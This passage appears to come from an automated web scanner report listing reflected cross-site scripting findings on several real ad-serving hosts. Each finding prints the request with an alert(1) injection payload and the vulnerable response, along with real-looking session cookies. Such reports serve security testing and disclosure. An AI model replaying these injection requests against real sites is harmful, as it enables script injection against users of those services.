Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 316
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Mar 2011 11:59:52 GMT
Expires: Tue, 08 Mar 2011 11:59:52 GMT
Connection: close

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3ac4/0/0/%2a/z;44306;0-0;0;46537204;4307-300/250;0/0/0;;~okv=;25dd4'-alert(1)-'524a5a4183f=1;bsg=3004;bsg=3017;;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

1.30. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bcfe"-alert(1)-"519b47b4f9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=160x600&section=1597598&6bcfe"-alert(1)-"519b47b4f9c=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x30bfc3.js&size_id=9&account_id=7469&site_id=12005&size=160x600
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 00:58:21 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 08 Mar 2011 00:58:21 GMT
Pragma: no-cache
Content-Length: 4648
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.yieldmanager.com/imp?6bcfe"-alert(1)-"519b47b4f9c=1&Z=160x600&s=1597598&_salt=2079337496";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new A
...[SNIP]...

1.31. http://ad3.liverail.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ad3.liverail.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b52ff<a>25841ea6f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?b52ff<a>25841ea6f9=1 HTTP/1.1
Host: ad3.liverail.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lr_uid=98718040;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 29 May 1984 15:00:00 GMT
Content-type: text/xml; charset=UTF-8
Connection: close
Date: Tue, 08 Mar 2011 12:00:03 GMT
Server: lighttpd/1.4.26-devel-3M
Content-Length: 184

<?xml version="1.0" encoding="utf-8"?>
<liverail content='error' version='3.0-10.194.157.219'><message>Publisher ID missing (/1//10.194.157.219/b52ff<a>25841ea6f9)</message></liverail>

1.32. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73547'%3balert(1)//76e8989e0ad was submitted in the admeld_adprovider_id parameter. This input was echoed as 73547';alert(1)//76e8989e0ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /admeld/match?admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=7873547'%3balert(1)//76e8989e0ad&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_300_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rt_1982=2; rt_14000=2; rt_14200=2; rt_15900=2; rt_17100=2; rt_19000=2; DotomiUser=330200604563575498$0$875515842; DotomiRR2018=-1$11669$1$; DotomiNet=2$DjQqblZ1RXVBDW1dBgd8WgBHKSpAJ25FCVxoWiwcJzNkew0OAQhAWwIPV0JcHwkeC2BYem5uVnVFdUENbV0GB3xaAEcjPFl7AFNdDCQGPRwoPwl9Cg4BBEJcAgdRQEtCRFtjZVpoNiETe0RzSw1gWwMEc1wCU3xvWDRSSgpJNAYWGA8qLj9mCgUIS1IDBVZFT05IXGZqXn5tdwQ1AXxCEDAMR1MUXwNVeXZiL0IeTQIiQwcBIBBkfwgACAhAXwIAXkRISElbZmVPKDsnBhkQOQJrZl8AAHZd; DotomiSession=1_330200604563575498$0$875515842$21657678$2736

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:49:57 GMT
X-Name: rtb-o04
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 201

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=7873547';alert(1)//76e8989e0ad&external_user_id=WH9qYVd2Q3FGAWJeBgV%2BWQlbaXsQfgZCDFxlX1ZL&expiration=1300672197" alt="" />')
...[SNIP]...

1.33. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 556cc'%3balert(1)//67076682b5c was submitted in the admeld_callback parameter. This input was echoed as 556cc';alert(1)//67076682b5c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /admeld/match?admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=78&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match556cc'%3balert(1)//67076682b5c HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_300_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rt_1982=2; rt_14000=2; rt_14200=2; rt_15900=2; rt_17100=2; rt_19000=2; DotomiUser=330200604563575498$0$875515842; DotomiRR2018=-1$11669$1$; DotomiNet=2$DjQqblZ1RXVBDW1dBgd8WgBHKSpAJ25FCVxoWiwcJzNkew0OAQhAWwIPV0JcHwkeC2BYem5uVnVFdUENbV0GB3xaAEcjPFl7AFNdDCQGPRwoPwl9Cg4BBEJcAgdRQEtCRFtjZVpoNiETe0RzSw1gWwMEc1wCU3xvWDRSSgpJNAYWGA8qLj9mCgUIS1IDBVZFT05IXGZqXn5tdwQ1AXxCEDAMR1MUXwNVeXZiL0IeTQIiQwcBIBBkfwgACAhAXwIAXkRISElbZmVPKDsnBhkQOQJrZl8AAHZd; DotomiSession=1_330200604563575498$0$875515842$21657678$2736

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:50:17 GMT
X-Name: rtb-o05
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 201

document.write('<img src="http://tag.admeld.com/match556cc';alert(1)//67076682b5c?admeld_adprovider_id=78&external_user_id=WH9qYVd2Q3FGAWJeBgV%2BWQlbaXsQfgZCDFxlX1ZL&expiration=1300672217" alt="" />')
...[SNIP]...

1.34. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 213a1'-alert(1)-'e329b3b055a was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /usersync?calltype=admeld&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=193213a1'-alert(1)-'e329b3b055a&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIItpsBEAoYASABKAEwhNzQ6wQQhNzQ6wQYAA..; sess=1; uuid2=4470455573253905340; anj=Kfw)*g>E9G)^w'db[wa]4dhBuV`GAFslJwp]L<J.9LI^n+5g7eUr#?b<4C)$Z5Z=xTluBk:eiK-Q'.whnauT$86Pd7Ck4BQhCI[ivg=pJ+YAOK+Y9V/4<ih)v)O?esGF)Rg50mIV#zZ6!5!RzB<G5c@xPK3]W[.B#8TJpd<HJWBwur<!u!$aJVL+3d)_yOPvwDAeDo>U.2<rWlT[a#!1DAkeE/C)/N*Yt.Qe8Ycq!MV7/xC`6hqLSM-.Jn69]E!69Q%rQHJ'lwCd8Et+.r$t@:dM^Sk]scstnXG2n3]SvMTQb!sN6MYd-+='ihI^k_Q=UwG:q)zNxacpTj/*V#lI`u.ocu#skfo4RJFZC_+]J<w6>^@'C9=W'w(ndZjdS#f%mcJxPrsGj(Gs*ZmED#C>DVkH5<v3a>/k3?_SP7fRHejoSEJS=nE4hF*5?u?s5v/3/gVBpVvbXw>95_BNXC]efSp1X#=V1nH24u0(_Yyqob%utI:C9>SkJCT4%b(.*oDLNk^<!z$Q/TeJt][Xe'%GrWh_2:Iq*3Rp=B8hxV/MtMn'9JN4IT>8e

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 08-Mar-2011 01:58:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4470455573253905340; path=/; expires=Sun, 05-Jun-2011 01:58:40 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:58:40 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193213a1'-alert(1)-'e329b3b055a&external_user_id=4470455573253905340&expiration=0" width="0" height="0"/>');

1.35. http://admeld.adnxs.com/usersync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9729'-alert(1)-'28e4793a760 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /usersync?calltype=admeld&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchf9729'-alert(1)-'28e4793a760 HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIItpsBEAoYASABKAEwhNzQ6wQQhNzQ6wQYAA..; sess=1; uuid2=4470455573253905340; anj=Kfw)*g>E9G)^w'db[wa]4dhBuV`GAFslJwp]L<J.9LI^n+5g7eUr#?b<4C)$Z5Z=xTluBk:eiK-Q'.whnauT$86Pd7Ck4BQhCI[ivg=pJ+YAOK+Y9V/4<ih)v)O?esGF)Rg50mIV#zZ6!5!RzB<G5c@xPK3]W[.B#8TJpd<HJWBwur<!u!$aJVL+3d)_yOPvwDAeDo>U.2<rWlT[a#!1DAkeE/C)/N*Yt.Qe8Ycq!MV7/xC`6hqLSM-.Jn69]E!69Q%rQHJ'lwCd8Et+.r$t@:dM^Sk]scstnXG2n3]SvMTQb!sN6MYd-+='ihI^k_Q=UwG:q)zNxacpTj/*V#lI`u.ocu#skfo4RJFZC_+]J<w6>^@'C9=W'w(ndZjdS#f%mcJxPrsGj(Gs*ZmED#C>DVkH5<v3a>/k3?_SP7fRHejoSEJS=nE4hF*5?u?s5v/3/gVBpVvbXw>95_BNXC]efSp1X#=V1nH24u0(_Yyqob%utI:C9>SkJCT4%b(.*oDLNk^<!z$Q/TeJt][Xe'%GrWh_2:Iq*3Rp=B8hxV/MtMn'9JN4IT>8e

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 08-Mar-2011 02:02:38 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4470455573253905340; path=/; expires=Sun, 05-Jun-2011 02:02:38 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 02:02:38 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/matchf9729'-alert(1)-'28e4793a760?admeld_adprovider_id=193&external_user_id=4470455573253905340&expiration=0" width="0" height="0"/>');

1.36. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70f21'%3balert(1)//e154bfaf813 was submitted in the admeld_adprovider_id parameter. This input was echoed as 70f21';alert(1)//e154bfaf813 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /clicksense/admeld/match?admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=7370f21'%3balert(1)//e154bfaf813&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_300_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=2tm6jj5l0la

Response

HTTP/1.1 200 OK
Cache-control: no-cache, no-store
Content-Type: text/plain
Date: Mon, 07 Mar 2011 01:49:40 GMT
P3P: CP=NOI ADM DEV CUR
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: 2=2tm6jj5l0la; Domain=.lucidmedia.com; Expires=Tue, 06-Mar-2012 01:49:40 GMT; Path=/
Content-Length: 192
Connection: keep-alive

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=7370f21';alert(1)//e154bfaf813&external_user_id=3346767141746773094"/>');

1.37. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac52f'%3balert(1)//d88f1d56111 was submitted in the admeld_callback parameter. This input was echoed as ac52f';alert(1)//d88f1d56111 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /clicksense/admeld/match?admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchac52f'%3balert(1)//d88f1d56111 HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_300_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=2tm6jj5l0la

Response

HTTP/1.1 200 OK
Cache-control: no-cache, no-store
Content-Type: text/plain
Date: Mon, 07 Mar 2011 01:50:48 GMT
P3P: CP=NOI ADM DEV CUR
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: 2=2tm6jj5l0la; Domain=.lucidmedia.com; Expires=Tue, 06-Mar-2012 01:50:49 GMT; Path=/
Content-Length: 192
Connection: keep-alive

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/matchac52f';alert(1)//d88f1d56111?admeld_adprovider_id=73&external_user_id=3346767141746773094"/>');

1.38. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c277"-alert(1)-"0cd1e690ae8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=728x90&section=1547458&9c277"-alert(1)-"0cd1e690ae8=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_BOT&groupid=1123043650&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:36:21 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 07 Mar 2011 01:36:21 GMT
Pragma: no-cache
Content-Length: 4645
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?9c277"-alert(1)-"0cd1e690ae8=1&Z=728x90&s=1547458&_salt=1004587447";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Ar
...[SNIP]...

1.39. http://ads.pointroll.com/PortalServe/ [r parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72088"%3balert(1)//e3ee0a1bc3b was submitted in the r parameter. This input was echoed as 72088";alert(1)//e3ee0a1bc3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /PortalServe/?pid=1211727V27020110211005352&time=0|19:14|-6&redir=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBGqZZMDF0Tb29HtOT6Qb229CjDbyUpt0BAAAAEAEgADgAWISHq-sXYMmGo4fUo4AQggEXY2EtcHViLTYwODUxODUxOTY5MzUyMDeyARh3d3cuZGNsay1kZWZhdWx0LXJlZi5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy5kY2xrLWRlZmF1bHQtcmVmLmNvbS_gAQOYAsA-wAIC4AIA6gImNjQ2MS9BcnRpc3RfQk9BL0FydGlzdF9CT0FfdG9wXzMwMHgyNTD4AvDRHpADpAOYA6QDqAMB4AQB%26num%3D0%26sig%3DAGiWqtxHLHtm8jZ8cA47khaDSdYjnTNfyA%26client%3Dca-pub-6085185196935207%26adurl%3D$CTURL$&r=0.246448996434823172088"%3balert(1)//e3ee0a1bc3b HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BBBAAsJvBBVBF4FR; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=D59D0400-34A2-18F5-1309-720000200101; PRca=|AKEA*263:1|#; PRcp=|AKEAAAEP:1|#; PRpl=|FFCo:1|#; PRcr=|GEHc:1|#; PRpc=|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 07 Mar 2011 01:31:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1211727' src='http://ads.pointroll.com/PortalServe/?pid=1211727V27020110211005352&cid=1443399&pos=h&redir=http://adclick.g.doubleclick.net/aclk%3Fsa=L%26ai=BGqZZMDF0Tb
...[SNIP]...
Rpc3RfQk9BL0FydGlzdF9CT0FfdG9wXzMwMHgyNTD4AvDRHpADpAOYA6QDqAMB4AQB%26num=0%26sig=AGiWqtxHLHtm8jZ8cA47khaDSdYjnTNfyA%26client=ca-pub-6085185196935207%26adurl=$CTURL$&time=0|19:14|-6&r=0.246448996434823172088";alert(1)//e3ee0a1bc3b&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

1.40. http://ads.pointroll.com/PortalServe/ [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3c93"-alert(1)-"142eba33132 was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /PortalServe/?pid=1211727V27020110211005352&time=0|19:14|-6&redir=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBGqZZMDF0Tb29HtOT6Qb229CjDbyUpt0BAAAAEAEgADgAWISHq-sXYMmGo4fUo4AQggEXY2EtcHViLTYwODUxODUxOTY5MzUyMDeyARh3d3cuZGNsay1kZWZhdWx0LXJlZi5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy5kY2xrLWRlZmF1bHQtcmVmLmNvbS_gAQOYAsA-wAIC4AIA6gImNjQ2MS9BcnRpc3RfQk9BL0FydGlzdF9CT0FfdG9wXzMwMHgyNTD4AvDRHpADpAOYA6QDqAMB4AQB%26num%3D0%26sig%3DAGiWqtxHLHtm8jZ8cA47khaDSdYjnTNfyA%26client%3Dca-pub-6085185196935207%26adurl%3D$CTURL$c3c93"-alert(1)-"142eba33132&r=0.2464489964348231 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BBBAAsJvBBVBF4FR; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=D59D0400-34A2-18F5-1309-720000200101; PRca=|AKEA*263:1|#; PRcp=|AKEAAAEP:1|#; PRpl=|FFCo:1|#; PRcr=|GEHc:1|#; PRpc=|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 07 Mar 2011 01:31:27 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1211727' src='http://ads.pointroll.com/PortalServe/?pid=1211727V27020110211005352&cid=1443399&pos=h&redir=http://adclick.g.doubleclick.net/aclk%3Fsa=L%26ai=BGqZZMDF0Tb
...[SNIP]...
mNvbS_gAQOYAsA-wAIC4AIA6gImNjQ2MS9BcnRpc3RfQk9BL0FydGlzdF9CT0FfdG9wXzMwMHgyNTD4AvDRHpADpAOYA6QDqAMB4AQB%26num=0%26sig=AGiWqtxHLHtm8jZ8cA47khaDSdYjnTNfyA%26client=ca-pub-6085185196935207%26adurl=$CTURL$c3c93"-alert(1)-"142eba33132&time=0|19:14|-6&r=0.2464489964348231&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

1.41. http://ads.pointroll.com/PortalServe/ [time parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the time request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9305"%3balert(1)//021a273d1f6 was submitted in the time parameter. This input was echoed as c9305";alert(1)//021a273d1f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

